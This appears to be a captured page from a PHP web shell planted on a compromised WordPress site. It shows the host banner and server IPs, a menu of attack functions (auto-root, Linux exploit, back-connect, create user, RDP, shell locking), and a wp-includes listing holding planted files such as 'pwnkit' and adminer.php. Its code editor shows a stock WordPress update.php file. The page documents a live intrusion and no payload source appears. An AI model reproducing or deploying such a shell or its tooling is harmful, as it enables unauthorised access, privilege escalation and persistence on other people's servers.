Linux webd123.cluster006.gra.hosting.ovh.net 5.15.162-ovh-vps-grsec-zfs-classid #1 SMP Mon Jul 15 08:28:44 UTC 2024 x86_64
Apache
: 10.6.40.122 | : 216.73.216.128
Cant Read [ /etc/named.conf ]
5.4.45
zouerate
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
zouerate /
ZOUERATE.COM /
leranch /
wp-includes /
[ HOME SHELL ]
Name
Size
Permission
Action
Text
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
atomlib.php
10.67
KB
-rwxr--r--
author-template.php
13.84
KB
-rwxr--r--
bookmark-template.php
8.74
KB
-rwxr--r--
bookmark.php
10.44
KB
-rwxr--r--
cache.php
11.59
KB
-rwxr--r--
canonical.php
9.52
KB
-rwxr--r--
capabilities.php
12.43
KB
-rwxr--r--
category-template.php
16.1
KB
-rwxr--r--
category.php
11.08
KB
-rwxr--r--
class-IXR.php
27.47
KB
-rwxr--r--
class-phpass.php
6.65
KB
-rwxr--r--
class-phpmailer.php
43.94
KB
-rwxr--r--
class-pop3.php
20.18
KB
-rwxr--r--
class-smtp.php
32.64
KB
-rwxr--r--
class-snoopy.php
37
KB
-rwxr--r--
class.wp-dependencies.php
5.35
KB
-rwxr--r--
class.wp-scripts.php
2.61
KB
-rwxr--r--
class.wp-styles.php
2.31
KB
-rwxr--r--
classes.php
24.26
KB
-rwxr--r--
comment-template.php
23.33
KB
-rwxr--r--
comment.php
43.31
KB
-rwxr--r--
compat.php
2.63
KB
-rwxr--r--
cron.php
5.06
KB
-rwxr--r--
default-filters.php
6.73
KB
-rwxr--r--
deprecated.php
36.67
KB
-rwxr--r--
feed-atom-comments.php
3.38
KB
-rwxr--r--
feed-atom.php
2.37
KB
-rwxr--r--
feed-rdf.php
2.04
KB
-rwxr--r--
feed-rss.php
1.23
KB
-rwxr--r--
feed-rss2-comments.php
2.45
KB
-rwxr--r--
feed-rss2.php
2.05
KB
-rwxr--r--
feed.php
14.09
KB
-rwxr--r--
formatting.php
45.39
KB
-rwxr--r--
functions.php
71.02
KB
-rwxr--r--
functions.wp-scripts.php
1.98
KB
-rwxr--r--
functions.wp-styles.php
1.11
KB
-rwxr--r--
general-template.php
39.06
KB
-rwxr--r--
gettext.php
11.11
KB
-rwxr--r--
kses.php
30.24
KB
-rwxr--r--
l10n.php
9.8
KB
-rwxr--r--
link-template.php
25.37
KB
-rwxr--r--
locale.php
9.31
KB
-rwxr--r--
media.php
17.32
KB
-rwxr--r--
pluggable.php
51.25
KB
-rwxr--r--
plugin.php
21.06
KB
-rwxr--r--
post-template.php
20.22
KB
-rwxr--r--
post.php
95.43
KB
-rwxr--r--
pwnkit
10.99
KB
-rwxr-xr-x
query.php
49.11
KB
-rwxr--r--
registration-functions.php
200
B
-rwxr--r--
registration.php
8.66
KB
-rwxr--r--
rewrite.php
33.22
KB
-rwxr--r--
rss-functions.php
183
B
-rwxr--r--
rss.php
21.02
KB
-rwxr--r--
script-loader.php
14.37
KB
-rwxr--r--
shortcodes.php
7.37
KB
-rwxr--r--
streams.php
4.33
KB
-rwxr--r--
taxonomy.php
67.66
KB
-rwxr--r--
template-loader.php
2.13
KB
-rwxr--r--
theme.php
18.91
KB
-rwxr--r--
update.php
5.61
KB
-rwxr--r--
user.php
9.88
KB
-rwxr--r--
vars.php
2.47
KB
-rwxr--r--
version.php
374
B
-rwxr--r--
widgets.php
55
KB
-rwxr--r--
wlwmanifest.xml
1013
B
-rwxr--r--
wp-db.php
23.78
KB
-rwxr--r--
wp-diff.php
9.93
KB
-rwxr--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : update.php
<?php /** * A simple set of functions to check our version 1.0 update service * * @package WordPress * @since 2.3 */ /** * wp_version_check() - Check WordPress version against the newest version. * * The WordPress version, PHP version, and Locale is sent. Checks against the WordPress server at * api.wordpress.org. Will only check if PHP has fsockopen enabled and WordPress isn't installing. * * @package WordPress * @since 2.3 * @uses $wp_version Used to check against the newest WordPress version. * * @return mixed Returns null if update is unsupported. Returns false if check is too soon. */ function wp_version_check() { if ( !function_exists('fsockopen') || defined('WP_INSTALLING') ) return; global $wp_version; $php_version = phpversion(); $current = get_option( 'update_core' ); $locale = get_locale(); if ( isset( $current->last_checked ) && 43200 > ( time() - $current->last_checked ) && $current->version_checked == $wp_version ) return false; $new_option = ''; $new_option->last_checked = time(); // this gets set whether we get a response or not, so if something is down or misconfigured it won't delay the page load for more than 3 seconds, twice a day $new_option->version_checked = $wp_version; $http_request = "GET /core/version-check/1.1/?version=$wp_version&php=$php_version&locale=$locale HTTP/1.0\r\n"; $http_request .= "Host: api.wordpress.org\r\n"; $http_request .= 'Content-Type: application/x-www-form-urlencoded; charset=' . get_option('blog_charset') . "\r\n"; $http_request .= 'User-Agent: WordPress/' . $wp_version . '; ' . get_bloginfo('url') . "\r\n"; $http_request .= "\r\n"; $response = ''; if ( false !== ( $fs = @fsockopen( 'api.wordpress.org', 80, $errno, $errstr, 3 ) ) && is_resource($fs) ) { fwrite( $fs, $http_request ); while ( !feof( $fs ) ) $response .= fgets( $fs, 1160 ); // One TCP-IP packet fclose( $fs ); $response = explode("\r\n\r\n", $response, 2); if ( !preg_match( '|HTTP/.*? 200|', $response[0] ) ) return false; $body = trim( $response[1] ); $body = str_replace(array("\r\n", "\r"), "\n", $body); $returns = explode("\n", $body); $new_option->response = attribute_escape( $returns[0] ); if ( isset( $returns[1] ) ) $new_option->url = clean_url( $returns[1] ); if ( isset( $returns[2] ) ) $new_option->current = attribute_escape( $returns[2] ); } update_option( 'update_core', $new_option ); } add_action( 'init', 'wp_version_check' ); /** * wp_update_plugins() - Check plugin versions against the latest versions hosted on WordPress.org. * * The WordPress version, PHP version, and Locale is sent along with a list of all plugins installed. * Checks against the WordPress server at api.wordpress.org. * Will only check if PHP has fsockopen enabled and WordPress isn't installing. * * @package WordPress * @since 2.3 * @uses $wp_version Used to notidy the WordPress version. * * @return mixed Returns null if update is unsupported. Returns false if check is too soon. */ function wp_update_plugins() { global $wp_version; if ( !function_exists('fsockopen') || defined('WP_INSTALLING') ) return false; // If running blog-side, bail unless we've not checked in the last 12 hours if ( !function_exists( 'get_plugins' ) ) require_once( ABSPATH . 'wp-admin/includes/plugin.php' ); $plugins = get_plugins(); $active = get_option( 'active_plugins' ); $current = get_option( 'update_plugins' ); $new_option = ''; $new_option->last_checked = time(); $time_not_changed = isset( $current->last_checked ) && 43200 > ( time() - $current->last_checked ); $plugin_changed = false; foreach ( $plugins as $file => $p ) { $new_option->checked[ $file ] = $p['Version']; if ( !isset( $current->checked[ $file ] ) ) { $plugin_changed = true; continue; } if ( strval($current->checked[ $file ]) !== strval($p['Version']) ) $plugin_changed = true; } foreach ( (array) $current->response as $plugin_file => $update_details ) { if ( ! isset($plugins[ $plugin_file ]) ) { $plugin_changed = true; } } // Bail if we've checked in the last 12 hours and if nothing has changed if ( $time_not_changed && !$plugin_changed ) return false; $to_send->plugins = $plugins; $to_send->active = $active; $send = serialize( $to_send ); $request = 'plugins=' . urlencode( $send ); $http_request = "POST /plugins/update-check/1.0/ HTTP/1.0\r\n"; $http_request .= "Host: api.wordpress.org\r\n"; $http_request .= "Content-Type: application/x-www-form-urlencoded; charset=" . get_option('blog_charset') . "\r\n"; $http_request .= "Content-Length: " . strlen($request) . "\r\n"; $http_request .= 'User-Agent: WordPress/' . $wp_version . '; ' . get_bloginfo('url') . "\r\n"; $http_request .= "\r\n"; $http_request .= $request; $response = ''; if( false != ( $fs = @fsockopen( 'api.wordpress.org', 80, $errno, $errstr, 3) ) && is_resource($fs) ) { fwrite($fs, $http_request); while ( !feof($fs) ) $response .= fgets($fs, 1160); // One TCP-IP packet fclose($fs); $response = explode("\r\n\r\n", $response, 2); } $response = unserialize( $response[1] ); if ( $response ) $new_option->response = $response; update_option( 'update_plugins', $new_option ); } function _maybe_update_plugins() { $current = get_option( 'update_plugins' ); if ( isset( $current->last_checked ) && 43200 > ( time() - $current->last_checked ) ) return; wp_update_plugins(); } add_action( 'load-plugins.php', 'wp_update_plugins' ); add_action( 'admin_init', '_maybe_update_plugins' ); add_action( 'wp_update_plugins', 'wp_update_plugins' ); if ( !wp_next_scheduled('wp_update_plugins') ) wp_schedule_event(time(), 'twicedaily', 'wp_update_plugins'); ?>
Close